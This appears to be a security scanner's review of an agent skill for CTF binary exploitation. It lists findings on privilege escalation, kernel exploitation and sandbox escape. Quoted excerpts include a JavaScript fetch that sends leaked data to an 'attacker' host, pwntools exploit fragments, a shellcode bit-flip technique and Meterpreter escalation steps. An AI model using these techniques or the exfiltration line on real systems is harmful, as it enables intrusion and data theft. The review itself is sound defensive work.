Ctf Pwn

Security checks across malware telemetry and agentic risk

Overview

This is a coherent CTF exploitation skill, but it gives an agent broad, actionable exploit and privilege-escalation guidance that should be reviewed before use.

Install only if you want agent assistance for authorized CTF, training, or isolated lab exploitation. Add explicit lab-only rules and require human approval before running exploit commands, making network callbacks, changing system files, weakening kernel protections, or attempting privilege escalation.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Rogue Agent: Self-Modification, Session Persistence
Findings (25)

Context-Inappropriate Capability

Severity: Medium
Confidence: 98%
Finding
This content expands beyond binary exploitation into cross-domain offensive tradecraft by describing an XSS-to-binary exploitation bridge and command stacking. Even in a CTF-oriented skill, embedding web exploitation and shell abuse materially broadens operator capability and misuse potential beyond the declared pwn scope.

Context-Inappropriate Capability

Severity: Medium
Confidence: 97%
Finding
Python sandbox escape guidance is out of scope for a binary-exploitation reference and introduces techniques for defeating language/runtime confinement. That makes the skill more dangerous because it teaches evasive breakout methods unrelated to the declared pwn purpose.

Context-Inappropriate Capability

Severity: Medium
Confidence: 99%
Finding
Guidance to modify /etc/passwd or /etc/sudoers provides concrete persistence and privilege-escalation actions against real systems, not merely CTF binary exploitation. This exceeds the skill's stated scope and creates clear dual-use abuse potential for unauthorized root access.

Missing User Warnings

Severity: Medium
Confidence: 95%
Finding
This section gives concrete instructions for data exfiltration to an attacker-controlled host and for command-stacking to bypass API controls, without any defensive framing or safeguards. In the context of an agent skill, this meaningfully increases the chance the skill could be used to facilitate unauthorized access, data theft, and post-exploitation activity.

Missing User Warnings

Severity: Medium
Confidence: 99%
Finding
This section provides concrete, actionable exploit instructions for arbitrary read/write, GOT overwrite, libc leakage, and spawning a shell, without any safety framing, restriction guidance, or defensive context. In an agent skill, such content materially enables offensive misuse by giving step-by-step procedures and code that can be reused against real binaries, not just analyzed abstractly.

Missing User Warnings

Severity: Medium
Confidence: 100%
Finding
The remainder of the file contains numerous end-to-end exploitation workflows covering sandbox escape, stack/heap corruption, ROP, inherited FD secret theft, shellcode construction, and code-signing bypass. Because it includes implementation details, payload structure, and operational advice across many vulnerability classes, it substantially increases the skill's capability for real-world offensive exploitation beyond benign CTF explanation.

Missing User Warnings

Severity: High
Confidence: 99%
Finding
This file is an operational exploitation guide, not just high-level theory: it includes step-by-step instructions, code, payload construction, shell spawning, privilege escalation, CFG/DEP/ASLR bypasses, and persistence-oriented process launching. In the context of an agent skill, this materially enables offensive actions against real systems without any safety boundaries, warnings, or scoping to authorized lab/CTF-only use.

Missing User Warnings

Severity: Medium
Confidence: 98%
Finding
This file is an operational exploit playbook containing step-by-step weaponized guidance, shellcode, ROP/FSOP chains, sandbox and seccomp bypasses, and command-execution patterns without any gating, safety framing, or clear restriction to controlled lab environments. In an agent skill context, this materially increases misuse risk because the content can directly enable exploitation of real systems rather than merely describing security concepts at a high level.

Missing User Warnings

Severity: Medium
Confidence: 98%
Finding
This file is a how-to guide for advanced exploitation techniques, including seccomp bypasses, UAF exploitation, ret2dlresolve, kernel exploitation patterns, and shellcode/ROP construction, yet it provides no safety boundaries, authorization requirements, or warning against use on non-consensual targets. In the context of an agent skill, this materially increases dual-use risk because it can directly assist offensive operations rather than merely describing concepts at a high level.

Missing User Warnings

Severity: High
Confidence: 96%
Finding
This section gives concrete kernel exploitation and privilege-escalation bypass instructions, including KPTI bypass methods such as signal-handler recovery, modprobe_path overwrite, and core_pattern abuse. Even in a CTF context, these are directly transferable to real systems and are presented operationally without prominent safety boundaries, lab-only constraints, or misuse warnings.

Missing User Warnings

Severity: High
Confidence: 98%
Finding
These instructions tell the user to modify initramfs and disable kernel hardening controls such as kptr_restrict, dmesg_restrict, and privilege dropping, specifically to preserve root and expose sensitive symbol/address information. That materially lowers system security and facilitates kernel exploit development and post-exploitation, with no clear warning that this should occur only in disposable, isolated test environments.

Missing User Warnings

Severity: High
Confidence: 96%
Finding
This section gives concrete, actionable instructions for a destructive kernel exploitation technique that modifies read-only file-backed pages and culminates in executing an attacker-controlled script as root, but it omits any warning that the technique can corrupt binaries, destabilize the system, and permanently damage the challenge environment. In a pwn skill focused on exploitation, this context makes the content more dangerous because it is directly aligned with offensive use and is presented as a practical recipe rather than high-level theory.

Missing User Warnings

Severity: Medium
Confidence: 91%
Finding
This section explicitly recommends a kernel panic-based leak technique without warning that it intentionally crashes the kernel and can destroy runtime state or interrupt services. Although framed for CTF use, the surrounding skill is an exploitation guide, so omission of crash-risk guidance materially increases the chance of misuse or accidental damage in real environments.

Missing User Warnings

Severity: High
Confidence: 98%
Finding
This file is an exploitation playbook for Linux kernel privilege escalation, including disabling mitigations, building kernel ROP chains, leaking canaries/KASLR, and overwriting modprobe_path/core_pattern to execute attacker-controlled code as root. In a CTF-oriented skill this may be educational, but as an agent skill it materially enables offensive actions without any safety boundary, scope limitation, or warning, so the content is dangerous as-is.

Missing User Warnings

Severity: Medium
Confidence: 94%
Finding
This section explicitly instructs how to spawn an interactive shell with execve/system-style ROP chains and then run post-exploitation commands such as `id` and `cat /flag*`. In a skill that can be operationalized by an agent, this goes beyond abstract education and provides directly usable offensive tradecraft without an explicit safety boundary or warning, increasing misuse risk.

Missing User Warnings

Severity: High
Confidence: 99%
Finding
This section gives explicit, actionable instructions to abuse a root-running CUSE/FUSE backdoor to change permissions on /etc/passwd, replace its contents, and obtain root access. Even in a CTF context, the material directly enables privilege escalation and destructive modification of critical authentication files, with no safety boundaries or warnings about system damage.

Missing User Warnings

Severity: High
Confidence: 99%
Finding
This passage recommends targeting /etc/passwd, /etc/shadow, and /etc/sudoers to gain root, which is concrete guidance for tampering with authentication and authorization controls. That crosses from educational vulnerability description into directly usable privilege-escalation tradecraft applicable outside lab environments.

External Transmission

Severity: Medium
Category: Data Exfiltration
Content
```javascript
// Stage 1: trigger heap commands, exfiltrate leak
var res = await fetch("/api/canvas/get/1");
var data = await res.json();
await fetch('http://attacker:5000/', {
    method: 'POST', mode: 'no-cors',
    body: JSON.stringify({"pixels": btoa(JSON.stringify(data.pixels))})
});
```
Confidence: 99%
Finding
fetch('http://attacker:5000/', { method: 'POST'

Instruction Override

Severity: High
Category: Prompt Injection
Content
**Alternative approach:** XOR shellcode with existing `.text` bytes, compute which bits differ, flip each one, then redirect execution to the shellcode location.

**Key insight:** A single-bit-flip primitive becomes arbitrary code execution through cumulative modifications. Each flip changes one instruction or operand, and returning to the function start enables unlimited flips. Priority targets: (a) stack unwinding instructions (control flow hijack), (b) existing branch instructions (bypass security checks), (c) `mprotect` arguments (change memory permissions), (d) size parameters (expand read buffers).

---
Confidence: 95%
Finding
bypass security

Self-Modification

Severity: High
Category: Rogue Agent
Content
**Exploit structure:**
1. Use `pop` instructions to adjust rsp to a predictable memory bucket (~1/16 probability due to ASLR)
2. Seed specific stack values for `pop sp` instruction (pivots to controlled location)
3. Place `syscall` gadget disguised as `push fs` with self-modifying byte mutation
4. Use `read(0, stage2_buf, size)` syscall to load stage 2
5. Stage 2 contains interactive shell code
Confidence: 97%
Finding
self-modify

Self-Modification

Severity: High
Category: Rogue Agent
Content
**Alternative approach:** XOR shellcode with existing `.text` bytes, compute which bits differ, flip each one, then redirect execution to the shellcode location.

**Key insight:** A single-bit-flip primitive becomes arbitrary code execution through cumulative modifications. Each flip changes one instruction or operand, and returning to the function start enables unlimited flips. Priority targets: (a) stack unwinding instructions (control flow hijack), (b) existing branch instructions (bypass security checks), (c) `mprotect` arguments (change memory permissions), (d) size parameters (expand read buffers).

---
Confidence: 94%
Finding
bypass security check

YARA rule 'exploit_framework': Exploit framework components and payloads [hacktools]

Severity: High
Category: YARA Match
Content
```python
from pwn import *

exe = ELF('./revenant')
io = process('./revenant')

# Calculate iterations needed to overflow shadow_stack_ptr to username
shadow_stack_addr = exe.symbols["shadow_stack"]
username_addr = exe.symbols["username"]
iterations = (username_addr - shadow_stack_addr) // 8  # 512
```
Confidence: 91%
Finding
from pwn import; from pwn import

YARA rule 'exploit_framework': Exploit framework components and payloads [hacktools]

Severity: High
Category: YARA Match
Content
```python
# Convert board to coordinates and feed to binary
import re
from pwn import *

rows = open('board.txt').read().split('\n')
coords = []
```
Confidence: 88%
Finding
from pwn import; from pwn import; from pwn import

YARA rule 'c2_framework_indicators': Command-and-control framework indicators (Cobalt Strike, Metasploit, Sliver, etc.) [malware]

Severity: Critical
Category: YARA Match
Content
## SeDebugPrivilege to SYSTEM (RainbowTwo HTB)

Exploits `SeDebugPrivilege` to escalate to SYSTEM by migrating into a SYSTEM-owned process. The privilege allows debugging any process, even if listed as "Disabled" -- Meterpreter enables it automatically before use.

**Steps:**
1. Upload Meterpreter payload and obtain a session
Confidence: 98%
Finding
Meterpreter; Meterpreter; meterpreter; meterpreter; Meterpreter

YARA rule 'exploit_framework': Exploit framework components and payloads [hacktools]

Severity: High
Category: YARA Match
Content
```python
from pwn import *

# r15 is the field immediately before rdi in the sigframe
# rdi = pointer to "/bin/sh" = 0x2f9fb0 → bytes [B0, 9F, 2F, ...]
# B0, 9F are UTF-8 continuation bytes (10xxxxxx) — invalid as sequence start
# Solution: set r15's last byte to 0xE0 (3-byte UTF-8 leader)
```
Confidence: 98%
Finding
from pwn import; from pwn import; from pwn import; from pwn import; from pwn import

VirusTotal

1/64 vendors flagged this skill as malicious, and 63/64 flagged it as clean.
